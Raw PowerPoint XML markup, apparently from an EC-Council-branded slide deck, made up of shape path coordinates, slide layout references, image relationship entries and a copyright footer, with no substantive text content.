                  <a:pt x="7835186" y="3364019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7860046" y="3560970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7875865" y="3762449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7880385" y="3970719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7875865" y="4174462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7860046" y="4375941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7835186" y="4572892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7801288" y="4769844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7758348" y="4960004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7704110" y="5150164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7643092" y="5333532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7570774" y="5512373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7491676" y="5686686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7405799" y="5858735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7310882" y="6026257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7206925" y="6186988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7098448" y="6343190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6980932" y="6490338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6856636" y="6635222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6727820" y="6773314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6589964" y="6906879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6447588" y="7029124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6298432" y="7149106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142497" y="7257768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5984302" y="7361904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5819326" y="7456984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5649832" y="7545272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5473556" y="7624506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5295022" y="7696948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111968" y="7758070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4924394" y="7810138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4734558" y="7855414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4540204" y="7891635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4343590" y="7916536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4142456" y="7932384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939062" y="7936911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3737928" y="7932384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3536794" y="7916536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340180" y="7891635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145826" y="7855414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2953731" y="7810138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768417" y="7758070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2583103" y="7696948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406828" y="7624506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230553" y="7545272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2061058" y="7456984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1896083" y="7361904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1737888" y="7257768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581953" y="7149106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432797" y="7029124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288161" y="6906879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152565" y="6773314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023749" y="6635222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="897193" y="6490338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="781937" y="6343190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="673460" y="6186988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569503" y="6026257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474586" y="5858735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388708" y="5686686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307351" y="5512373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237293" y="5333532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176275" y="5150164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122036" y="4960004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79098" y="4769844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45199" y="4572892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20339" y="4375941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4520" y="4174462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3970719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4520" y="3762449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20339" y="3560970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45199" y="3364019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79098" y="3167068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122036" y="2976908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176275" y="2786748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237293" y="2603379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307351" y="2424539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388708" y="2250226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474586" y="2078176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569503" y="1910654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="673460" y="1749924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="781937" y="1593721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="897193" y="1446574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023749" y="1301690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152565" y="1163598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288161" y="1030033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432797" y="907787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581953" y="787805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1737888" y="679143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1896083" y="575007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2061058" y="479927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230553" y="391639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406828" y="312406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2583103" y="239964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768417" y="178841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2953731" y="126773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145826" y="81497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340180" y="45276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3536794" y="20374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3737928" y="4528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2926592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142854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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advClick="0" advTm="3000"/>
    </mc:Fallback>
  </mc:AlternateConten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Our team 1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5350933" y="0"/>
            <a:ext cx="5283201" cy="6858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345687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image" Target="../media/image2.png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slideLayout" Target="../slideLayouts/slideLayout25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2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0CC067E7-EB32-4FAB-8864-CCD35C92B7B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12192000" cy="6631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8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B3D6A0B0-E492-477B-8CA2-54D2143B8E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"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6564217"/>
            <a:ext cx="12192000" cy="293783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87676BF1-E353-4336-90DE-FA74256AE3B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508883" y="6584150"/>
            <a:ext cx="6676283" cy="25391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sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Copyright © by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Impact" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EC-Council</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>All Rights Reserved. Reproduction is Strictly Prohibited.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2207123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19" r:id="rId1"/>
    <p:sldLayoutId id="2147483820" r:id="rId2"/>
    <p:sldLayoutId id="2147483824" r:id="rId3"/>
    <p:sldLayoutId id="2147483825" r:id="rId4"/>
    <p:sldLayoutId id="2147483827" r:id="rId5"/>
    <p:sldLayoutId id="2147483752" r:id="rId6"/>
    <p:sldLayoutId id="2147483753" r:id="rId7"/>
    <p:sldLayoutId id="2147483759" r:id="rId8"/>
    <p:sldLayoutId id="2147483781" r:id="rId9"/>
    <p:sldLayoutId id="2147483783" r:id="rId10"/>
    <p:sldLayoutId id="2147483836" r:id="rId11"/>
    <p:sldLayoutId id="2147483841" r:id="rId12"/>
    <p:sldLayoutId id="2147483844" r:id="rId13"/>
    <p:sldLayoutId id="2147483865" r:id="rId14"/>
    <p:sldLayoutId id="2147483866" r:id="rId15"/>
    <p:sldLayoutId id="2147483888" r:id="rId16"/>
    <p:sldLayoutId id="2147484080" r:id="rId17"/>
    <p:sldLayoutId id="2147484098" r:id="rId18"/>
    <p:sldLayoutId id="2147484148" r:id="rId19"/>
    <p:sldLayoutId id="2147484221" r:id="rId20"/>
    <p:sldLayoutId id="2147484405" r:id="rId21"/>
    <p:sldLayoutId id="2147484413" r:id="rId22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B3D6A0B0-E492-477B-8CA2-54D2143B8E05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6562800"/>
            <a:ext cx="12193200" cy="295200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7676BF1-E353-4336-90DE-FA74256AE3B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508883" y="6584150"/>
            <a:ext cx="6676283" cy="25391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sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Copyright © by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Impact" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EC-Council</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>All Rights Reserved. Reproduction is Strictly Prohibited.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16212885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07" r:id="rId1"/>
    <p:sldLayoutId id="2147484408" r:id="rId2"/>
    <p:sldLayoutId id="2147484409" r:id="rId3"/>
    <p:sldLayoutId id="2147484410" r:id="rId4"/>
    <p:sldLayoutId id="2147484411" r:id="rId5"/>
    <p:sldLayoutId id="2147484412" r:id="rId6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4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6.pn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Layout" Target="../slideLayouts/slideLayout8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9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0.jpe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2.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54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25.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId29" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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58.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60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65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64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66.jpe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67.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59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5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69.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png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.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/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76.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp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.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77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2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73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image" Target="../media/image8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0.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89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.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98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4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97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98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77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.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105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.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.jpeg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110.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124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1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138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37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135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.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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2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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145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0.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png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8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6.jpe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0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7.png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8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9.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19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jpe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6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jpe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026310" y="609600"/>
            <a:ext cx="7494483" cy="2795614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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5300" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="48000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
